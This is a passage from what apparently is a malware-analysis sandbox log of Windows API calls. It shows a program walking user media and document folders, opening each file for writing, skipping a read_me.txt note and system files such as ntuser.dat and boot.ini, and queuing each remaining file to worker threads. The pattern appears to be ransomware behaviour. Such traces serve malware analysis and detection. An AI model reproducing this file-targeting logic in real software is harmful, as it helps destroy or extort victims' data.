dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.222] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\read_me.txt") returned 74 [0076.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\wmmlxsh\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9ac [0076.222] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.222] CloseHandle (hObject=0x9ac) returned 1 [0076.222] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cbb9510, ftCreationTime.dwHighDateTime=0x1d4c61b, ftLastAccessTime.dwLowDateTime=0x3d109320, ftLastAccessTime.dwHighDateTime=0x1d4cccf, ftLastWriteTime.dwLowDateTime=0x3d109320, ftLastWriteTime.dwHighDateTime=0x1d4cccf, nFileSizeHigh=0x0, nFileSizeLow=0x1386d, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="zY1gAR74jXX.mp3", cAlternateFileName="ZY1GAR~1.MP3")) returned 1 [0076.222] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\zY1gAR74jXX.mp3") returned 78 [0076.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\zY1gAR74jXX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\wmmlxsh\\zy1gar74jxx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9ac [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="read_me.txt") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="desktop.ini") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="autorun.inf") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="iconcache.db") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="boot.ini") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.222] StrStrW (lpFirst="zy1gar74jxx.mp3", lpSrch="thumbs.db") returned 0x0 [0076.222] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 141 [0076.222] QueueUserWorkItem (Function=0x404e00, Context=0x9ac, Flags=0x0) returned 1 [0076.222] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cbb9510, ftCreationTime.dwHighDateTime=0x1d4c61b, ftLastAccessTime.dwLowDateTime=0x3d109320, ftLastAccessTime.dwHighDateTime=0x1d4cccf, ftLastWriteTime.dwLowDateTime=0x3d109320, ftLastWriteTime.dwHighDateTime=0x1d4cccf, nFileSizeHigh=0x0, nFileSizeLow=0x1386d, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="zy1gar74jxx.mp3", cAlternateFileName="ZY1GAR~1.MP3")) returned 0 [0076.223] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.223] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh\\read_me.txt") returned 74 [0076.223] GetProcessHeap () returned 0x4f10000 [0076.223] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0076.223] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 75 [0076.223] GetProcessHeap () returned 0x4f10000 [0076.223] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d410b0 | out: hHeap=0x4f10000) returned 1 [0076.223] GetProcessHeap () returned 0x4f10000 [0076.223] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0076.223] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\*") returned 49 [0076.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dd6c590, ftCreationTime.dwHighDateTime=0x1d4cfb7, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.223] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\.") returned 49 [0076.223] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dd6c590, ftCreationTime.dwHighDateTime=0x1d4cfb7, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.223] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\..") returned 50 [0076.223] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31bbe620, ftCreationTime.dwHighDateTime=0x1d4d263, ftLastAccessTime.dwLowDateTime=0x14809f60, ftLastAccessTime.dwHighDateTime=0x1d4ce7b, ftLastWriteTime.dwLowDateTime=0x14809f60, ftLastWriteTime.dwHighDateTime=0x1d4ce7b, nFileSizeHigh=0x0, nFileSizeLow=0x5c21, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="AmZPmY.wav", cAlternateFileName="")) returned 1 [0076.223] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\AmZPmY.wav") returned 58 [0076.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\AmZPmY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sj5nvd\\amzpmy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b0 [0076.223] StrStrW (lpFirst="amzpmy.wav", lpSrch="read_me.txt") returned 0x0 [0076.223] StrStrW (lpFirst="amzpmy.wav", lpSrch="autoexec.bat") returned 0x0 [0076.223] StrStrW (lpFirst="amzpmy.wav", lpSrch="desktop.ini") returned 0x0 [0076.223] StrStrW (lpFirst="amzpmy.wav", lpSrch="autorun.inf") returned 0x0 [0076.223] StrStrW (lpFirst="amzpmy.wav", lpSrch="ntuser.dat") returned 0x0 [0076.224] StrStrW (lpFirst="amzpmy.wav", lpSrch="iconcache.db") returned 0x0 [0076.224] StrStrW (lpFirst="amzpmy.wav", lpSrch="bootsect.bak") returned 0x0 [0076.224] StrStrW (lpFirst="amzpmy.wav", lpSrch="boot.ini") returned 0x0 [0076.224] StrStrW (lpFirst="amzpmy.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.224] StrStrW (lpFirst="amzpmy.wav", lpSrch="thumbs.db") returned 0x0 [0076.224] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 142 [0076.224] QueueUserWorkItem (Function=0x404e00, Context=0x9b0, Flags=0x0) returned 1 [0076.224] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c26640, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.224] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\read_me.txt") returned 59 [0076.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6sj5nvd\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b4 [0076.224] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.224] CloseHandle (hObject=0x9b4) returned 1 [0076.224] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c26640, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.224] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.224] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd\\read_me.txt") returned 59 [0076.224] GetProcessHeap () returned 0x4f10000 [0076.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0076.224] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 76 [0076.224] GetProcessHeap () returned 0x4f10000 [0076.224] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d01090 | out: hHeap=0x4f10000) returned 1 [0076.225] GetProcessHeap () returned 0x4f10000 [0076.225] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0076.225] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned 48 [0076.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c26640, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0076.225] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\read_me.txt") returned 58 [0076.225] GetProcessHeap () returned 0x4f10000 [0076.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0076.225] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 77 [0076.225] GetProcessHeap () returned 0x4f10000 [0076.225] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ce1080 | out: hHeap=0x4f10000) returned 1 [0076.228] GetProcessHeap () returned 0x4f10000 [0076.228] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d610c0 [0076.228] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned 43 [0076.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c26640, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0076.229] wnsprintfW (in: pszDest=0x8d610c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\read_me.txt") returned 53 [0076.229] GetProcessHeap () returned 0x4f10000 [0076.229] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d610c0 | out: hHeap=0x4f10000) returned 1 [0076.230] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 78 [0076.230] GetProcessHeap () returned 0x4f10000 [0076.230] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d710c8 | out: hHeap=0x4f10000) returned 1 [0076.230] GetProcessHeap () returned 0x4f10000 [0076.231] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.231] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 44 [0076.231] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.232] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.") returned 44 [0076.232] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.232] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\..") returned 45 [0076.232] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71ca650, ftCreationTime.dwHighDateTime=0x1d4c9ee, ftLastAccessTime.dwLowDateTime=0xf8091290, ftLastAccessTime.dwHighDateTime=0x1d4d56e, ftLastWriteTime.dwLowDateTime=0xf8091290, ftLastWriteTime.dwHighDateTime=0x1d4d56e, nFileSizeHigh=0x0, nFileSizeLow=0x7be3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="-NviZXX.png", cAlternateFileName="")) returned 1 [0076.232] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-NviZXX.png") returned 54 [0076.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-NviZXX.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-nvizxx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b4 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="read_me.txt") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="autoexec.bat") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="desktop.ini") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="autorun.inf") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="ntuser.dat") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="iconcache.db") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="bootsect.bak") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="boot.ini") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.232] StrStrW (lpFirst="-nvizxx.png", lpSrch="thumbs.db") returned 0x0 [0076.232] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 143 [0076.232] QueueUserWorkItem (Function=0x404e00, Context=0x9b4, Flags=0x0) returned 1 [0076.232] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19ebe920, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x8abb59f0, ftLastAccessTime.dwHighDateTime=0x1d4ca9c, ftLastWriteTime.dwLowDateTime=0x8abb59f0, ftLastWriteTime.dwHighDateTime=0x1d4ca9c, nFileSizeHigh=0x0, nFileSizeLow=0x89ed, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="0PjZJ2x_.png", cAlternateFileName="")) returned 1 [0076.232] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0PjZJ2x_.png") returned 55 [0076.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0PjZJ2x_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0pjzj2x_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b8 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="read_me.txt") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="autoexec.bat") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="desktop.ini") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="autorun.inf") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="ntuser.dat") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="iconcache.db") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="bootsect.bak") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="boot.ini") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.233] StrStrW (lpFirst="0pjzj2x_.png", lpSrch="thumbs.db") returned 0x0 [0076.233] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 144 [0076.233] QueueUserWorkItem (Function=0x404e00, Context=0x9b8, Flags=0x0) returned 1 [0076.233] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd98fe0, ftCreationTime.dwHighDateTime=0x1d4c6d5, ftLastAccessTime.dwLowDateTime=0x86014690, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x86014690, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0xe428, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="22d0g9LYY-eR.png", cAlternateFileName="22D0G9~1.PNG")) returned 1 [0076.233] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\22d0g9LYY-eR.png") returned 59 [0076.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\22d0g9LYY-eR.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\22d0g9lyy-er.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9bc [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="read_me.txt") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="autoexec.bat") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="desktop.ini") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="autorun.inf") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="ntuser.dat") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="iconcache.db") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="bootsect.bak") returned 0x0 [0076.233] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="boot.ini") returned 0x0 [0076.234] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.234] StrStrW (lpFirst="22d0g9lyy-er.png", lpSrch="thumbs.db") returned 0x0 [0076.234] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 145 [0076.234] QueueUserWorkItem (Function=0x404e00, Context=0x9bc, Flags=0x0) returned 1 [0076.234] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7040f0e0, ftCreationTime.dwHighDateTime=0x1d4c604, ftLastAccessTime.dwLowDateTime=0x6b45c660, ftLastAccessTime.dwHighDateTime=0x1d4cf82, ftLastWriteTime.dwLowDateTime=0x6b45c660, ftLastWriteTime.dwHighDateTime=0x1d4cf82, nFileSizeHigh=0x0, nFileSizeLow=0xbb98, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="3q833.gif", cAlternateFileName="")) returned 1 [0076.234] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3q833.gif") returned 52 [0076.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3q833.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3q833.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="read_me.txt") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="autoexec.bat") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="desktop.ini") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="autorun.inf") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="ntuser.dat") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="iconcache.db") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="bootsect.bak") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="boot.ini") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="ntuser.dat.log") returned 0x0 [0076.234] StrStrW (lpFirst="3q833.gif", lpSrch="thumbs.db") returned 0x0 [0076.234] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 146 [0076.234] QueueUserWorkItem (Function=0x404e00, Context=0x9c0, Flags=0x0) returned 1 [0076.234] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69bc7840, ftCreationTime.dwHighDateTime=0x1d4c9e5, ftLastAccessTime.dwLowDateTime=0xfaff2110, ftLastAccessTime.dwHighDateTime=0x1d4d08c, ftLastWriteTime.dwLowDateTime=0xfaff2110, ftLastWriteTime.dwHighDateTime=0x1d4d08c, nFileSizeHigh=0x0, nFileSizeLow=0x14388, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="4m4dkna2MBvFQv.bmp", cAlternateFileName="4M4DKN~1.BMP")) returned 1 [0076.234] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4m4dkna2MBvFQv.bmp") returned 61 [0076.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4m4dkna2MBvFQv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4m4dkna2mbvfqv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c4 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", 